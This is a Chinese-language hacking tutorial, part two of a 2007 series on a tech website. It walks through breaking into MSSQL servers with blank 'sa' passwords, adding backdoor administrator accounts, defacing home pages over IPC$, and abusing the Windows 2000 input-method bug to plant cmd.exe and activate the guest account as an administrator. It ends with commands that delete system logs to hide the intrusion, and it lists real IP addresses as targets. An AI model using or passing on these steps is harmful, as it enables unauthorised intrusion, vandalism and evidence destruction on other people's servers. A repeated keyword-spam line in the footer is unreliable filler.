流行的漏洞入侵(二)
ReadyGo!技术成就梦想
网上整理
efish
2007-4-13 16:44:48
4 sql攻击网站
这个也很方便,呵呵,上次在对美国大战中也有不少兄弟是用这种方法的,来看看吧
我们需要小榕的流光作为武器,到www.neteyes.com去down一个
运行流光然后按快捷键ctrl+r搜索!
选择aql!输入开始和结束的ip!扫描吧!到搜索结束!察看流光最下面的视图!格式如下:
用户名 密码 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密码为空!
双击其中一项(或在工具……>sql登录)!会弹出一个dos窗口!如果过一会该窗口消失!没戏了!对方不支持远程登录!在换一个!如果过一会出现如下的字样:
sql remote cmd for fluxay 2001 by assassin 1995 - 2000. thanks to eyas!
connect to 211.21.220.28 mssql server success, type command in prompt.
sqlcmd>
那表示已经登录上了对方的主机!然后
sqlcmd>net user ‘察看用户!如果不能察看,说明sa权限不够,那也没戏,换其他的方法!或是走人!有时用net user察看成功!再试试
sqlcmd>net user administrator ’察看admin的情况(可知是否在线)如果失败,撤退吧,
没戏,换方法! 没有权限,但是如果可以的话
下一步:
sqlcmd>net user hacker password /add @#添加一给名为hacker,密码为passwod的用户!
sqlcmd>net localgroup administrators hacker /add @# 把刚才创建的用户加入 admnistrators组
好了,告一段落,下面启动dos用刚创建的用户进行ipc$
net use \\*.*.*.*\ipc$ "password" /user:"hacker" @#很熟悉吧!ipc$开始了!
执行成功的话!搞吧!删除!上传!下载!要什么!随你!
例如copy c:\hacker\index.htm \\ip\c$\inetpub\wwwroot\default.htm (ip为它的ip)
干什么,换他的主页啊!呵呵!
据我的实践!针对台湾的主机!另一方法是用刚创建的用户名和密码用cuteftp登录!就象管理自己的站点一样!任意删除创建html页面!此方法对美国的主机没有成功过!我都是ipc$搞定的!
以上的原理是用sql开门!用ipc$进门做作administrator可以作的事!但对于sql主机!administrator一般没有对数据库删除或创建的权限!此时可以down下他的sam文件解密(怎么down?晕,看看我在上面unicode中写的教材)!默认用户名sqlagentcmdexec,然后用天行的sqlbrowse登录就可以对数据库任意操作了!
5 利用输入法漏洞
要说老美真不是东西,这么大个洞现在还尚存人间,也好,大家可以练练手
1、用端口扫瞄程序扫ip的3389端口,得到xx.xx.xx.xx。
2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。
3、出现windows2000的登陆窗口,按下ctrl+shift键,出现全拼输入法。
4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。
5、选择"跳转到url",输入:c:\winnt\system32\cmd.exe.
6、选择"保存到磁盘"。
7、选择目录:c:\inetpub\scripts\
8、打开ie,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (知道了吧)
9、输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+beijing+>c:\inetpub\wwwroot\default.asp
还有一种方法
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到url",输入:c:\winnt\system32\cmd.exe.(如果不能确定nt系统目录,则输入:c:\ 或d:\ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开ie,输入: dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7. echo net user guest /active:yes>go.bat
8. echo net user guest elise>>go.bat
9. echo net localgroup administrators /add guest>>go.bat
10. type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到url",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),
最后一定别不记的x掉自已的脚印
del+c:\winnt\system32\logfiles\*.*
del+c:\winnt\ssytem32\config\*.evt
del+c:\winnt\system32\dtclog\*.*
del+c:\winnt\system32\*.log
del+c:\winnt\system32\*.txt
del+c:\winnt\*.txt
del+c:\winnt\*.log
责任编辑: efish
参与评论
查找更多:
ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题
-
相关文章
流行的漏洞入侵(一)
1 unicode漏洞 这是老漏洞了,但对于新手来说很好用,而且事实证明现在仍有很多的机子有这种漏洞,ok我们开始 ..
流行的漏洞入侵(四)
6 教你dos攻击微软的pptp 呵呵,大家没有看错,的确是微软的,我们先看看pptp是个什么东东pptp(piont-to-point..
“小邮差”(worm.mimail.e) 新变..
病毒名称: worm.mimail.e 中文名称: 小邮差 威胁级别: 4c 受影响系统: win9x/nt/2k/xp/2003 病..
常用端口对照详解
端口:0 服务:reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端 口..
给邮件一个家—otg公司发布邮件存..
● 邮件服务器每隔18天就会达到饱和 ● 企业用户平均每天花费2.5小时来管理邮箱 ● 81%的用户需要访问已经归..
e-mail存储备份解决方案
随着internet的迅速发展,网络用户的数量不断增多,许多事情都通过e-mail传输并最后确定。随着相关业务的不..
2秒记住本站域名
玩过泡泡龙吗?Readygo?Go! 再加上.Com.Cn的后缀,那就是大名小顶的ReadyGo.com.cn